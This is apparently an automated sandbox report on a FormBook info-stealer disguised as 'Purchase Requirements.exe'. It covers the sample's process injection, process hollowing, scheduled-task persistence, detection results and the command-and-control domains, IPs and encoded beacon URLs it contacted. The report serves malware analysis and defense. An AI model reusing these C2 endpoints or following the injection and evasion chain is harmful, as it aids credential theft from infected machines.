          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection712Masquerading1OS Credential DumpingSecurity Software Discovery321Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsScheduled Task/Job1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection712NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobTimestomp1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 458827 Sample: Purchase Requirements.exe Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 41 www.theredcymbalsco.com 2->41 43 www.teamtacozzzz.com 2->43 45 2 other IPs or domains 2->45 53 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->53 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 10 other signatures 2->59 11 Purchase Requirements.exe 7 2->11         started        signatures3 process4 file5 33 C:\Users\user\AppData\...\UCnSWpQKXBXg.exe, PE32 11->33 dropped 35 C:\Users\...\UCnSWpQKXBXg.exe:Zone.Identifier, ASCII 11->35 dropped 37 C:\Users\user\AppData\Local\Temp\tmp47B.tmp, XML 11->37 dropped 39 C:\Users\...\Purchase Requirements.exe.log, ASCII 11->39 dropped 69 Writes to foreign memory regions 11->69 71 Injects a PE file into a foreign processes 11->71 15 MSBuild.exe 11->15         started        18 schtasks.exe 1 11->18         started        signatures6 process7 signatures8 73 Modifies the context of a thread in another process (thread injection) 15->73 75 Maps a DLL or memory area into another process 15->75 77 Sample uses process hollowing technique 15->77 79 2 other signatures 15->79 20 explorer.exe 15->20 injected 24 conhost.exe 18->24         started        process9 dnsIp10 47 www.braun-mathematik.online 217.160.0.129, 49767, 80 ONEANDONE-ASBrauerstrasse48DE Germany 20->47 49 www.mynjelderlaw.com 74.208.236.212, 49771, 80 ONEANDONE-ASBrauerstrasse48DE United States 20->49 51 8 other IPs or domains 20->51 61 System process connects to network (likely due to code injection or exploit) 20->61 26 colorcpl.exe 20->26         started        signatures11 process12 signatures13 63 Modifies the context of a thread in another process (thread injection) 26->63 65 Maps a DLL or memory area into another process 26->65 67 Tries to detect virtualization through RDTSC time measurements 26->67 29 cmd.exe 1 26->29         started        process14 process15 31 conhost.exe 29->31         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Purchase Requirements.exe34%VirustotalBrowse
          Purchase Requirements.exe33%ReversingLabsByteCode-MSIL.Spyware.Noon
          Purchase Requirements.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\UCnSWpQKXBXg.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\UCnSWpQKXBXg.exe33%ReversingLabsByteCode-MSIL.Spyware.Noon

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.MSBuild.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.braun-mathematik.online0%VirustotalBrowse
          shops.myshopify.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://cdn.jsinit.directfwd.com/sk-jspark_init.php0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cnTCr0%Avira URL Cloudsafe
          http://www.mariasmoworldwide.com/n8ba/?YDKPpTg0=gDLflU22h4aNrBeOW4VXQ696ddSmWDeh6I9xRo3nz/h3BsDrL/4ZQIL6r35kaA0glkfe&FHtx=1bcPl8l0PFatcZcp0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.narrowpathwc.com/n8ba/?YDKPpTg0=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8vRrR2bvla&FHtx=1bcPl8l0PFatcZcp0%Avira URL Cloudsafe
          http://www.braun-mathematik.online/n8ba/?YDKPpTg0=+h7Xj+nXKVKiaIR46Fq1cf2yPuoKyU42UFvvfLIT79wfatbgIi2aH2e1i+WvrVB3N3qO&FHtx=1bcPl8l0PFatcZcp0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          www.narrowpathwc.com/n8ba/0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.thefitflect.com/n8ba/?YDKPpTg0=OvBvP1Su9fWFY0UPkW0anmpJM9mANCcukNJzgBj3kCnMbGPnYOnff5N4Ec4XgmlqGLmb&FHtx=1bcPl8l0PFatcZcp0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cna-e50%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/-e50%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.theredcymbalsco.com/n8ba/?YDKPpTg0=9vokcWjvDccQU4MCm09VADFSZD35cLZafv0mNDf58+cuq+V2woxjt+NJE4WV9inYEz7b&FHtx=1bcPl8l0PFatcZcp0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.founder.com.cn/cna0%URL Reputationsafe
          http://www.mynjelderlaw.com/n8ba/?YDKPpTg0=j7TP3kg+SFNkJlLKMby/j4R6QZto1j85Usiv6TCoiWa/2cyAi3BRSjJegq0lHS5IvzJL&FHtx=1bcPl8l0PFatcZcp0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.founder.com.cn/cnn-u0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.fontbureau.com80%Avira URL Cloudsafe
          http://www.fontbureau.comionoB0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.goldenstatelabradoodles.com/n8ba/?YDKPpTg0=e60qEcsD/l81wB0bMHsW7u7BjuDaTcxFYqyxe5BzllGz/xR5NT7a3L6d+84tw9tNKT87&FHtx=1bcPl8l0PFatcZcp0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          narrowpathwc.com
          160.153.136.3
          truetrue
            unknown
            teamtacozzzz.com
            34.102.136.180
            truefalse
              unknown
              www.braun-mathematik.online
              217.160.0.129
              truetrueunknown
              shops.myshopify.com
              23.227.38.74
              truetrueunknown
              mariasmoworldwide.com
              162.241.85.227
              truetrue
                unknown
                theredcymbalsco.com
                184.168.131.241
                truetrue
                  unknown
                  goldenstatelabradoodles.com
                  34.102.136.180
                  truefalse
                    unknown
                    www.mynjelderlaw.com
                    74.208.236.212
                    truetrue
                      unknown
                      www.goldenstatelabradoodles.com
                      unknown
                      unknowntrue
                        unknown
                        www.theredcymbalsco.com
                        unknown
                        unknowntrue
                          unknown
                          www.mariasmoworldwide.com
                          unknown
                          unknowntrue
                            unknown
                            www.narrowpathwc.com
                            unknown
                            unknowntrue
                              unknown
                              www.thefitflect.com
                              unknown
                              unknowntrue
                                unknown
                                www.teamtacozzzz.com
                                unknown
                                unknowntrue
                                  unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.mariasmoworldwide.com/n8ba/?YDKPpTg0=gDLflU22h4aNrBeOW4VXQ696ddSmWDeh6I9xRo3nz/h3BsDrL/4ZQIL6r35kaA0glkfe&FHtx=1bcPl8l0PFatcZcptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.narrowpathwc.com/n8ba/?YDKPpTg0=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8vRrR2bvla&FHtx=1bcPl8l0PFatcZcptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.braun-mathematik.online/n8ba/?YDKPpTg0=+h7Xj+nXKVKiaIR46Fq1cf2yPuoKyU42UFvvfLIT79wfatbgIi2aH2e1i+WvrVB3N3qO&FHtx=1bcPl8l0PFatcZcptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  www.narrowpathwc.com/n8ba/true
                                  • Avira URL Cloud: safe
                                  low
                                  http://www.thefitflect.com/n8ba/?YDKPpTg0=OvBvP1Su9fWFY0UPkW0anmpJM9mANCcukNJzgBj3kCnMbGPnYOnff5N4Ec4XgmlqGLmb&FHtx=1bcPl8l0PFatcZcptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.theredcymbalsco.com/n8ba/?YDKPpTg0=9vokcWjvDccQU4MCm09VADFSZD35cLZafv0mNDf58+cuq+V2woxjt+NJE4WV9inYEz7b&FHtx=1bcPl8l0PFatcZcpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.mynjelderlaw.com/n8ba/?YDKPpTg0=j7TP3kg+SFNkJlLKMby/j4R6QZto1j85Usiv6TCoiWa/2cyAi3BRSjJegq0lHS5IvzJL&FHtx=1bcPl8l0PFatcZcptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.goldenstatelabradoodles.com/n8ba/?YDKPpTg0=e60qEcsD/l81wB0bMHsW7u7BjuDaTcxFYqyxe5BzllGz/xR5NT7a3L6d+84tw9tNKT87&FHtx=1bcPl8l0PFatcZcpfalse
                                  • Avira URL Cloud: safe
                                  unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://cdn.jsinit.directfwd.com/sk-jspark_init.phpcolorcpl.exe, 0000000F.00000002.921199277.0000000004AA2000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.apache.org/licenses/LICENSE-2.0Purchase Requirements.exe, 00000000.00000003.658862598.00000000009DB000.00000004.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.fontbureau.comPurchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.fontbureau.com/designersGPurchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.fontbureau.com/designers/?Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.founder.com.cn/cn/bThePurchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.founder.com.cn/cnTCrPurchase Requirements.exe, 00000000.00000003.658349095.00000000009DB000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fontbureau.com/designers?Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.tiro.comexplorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
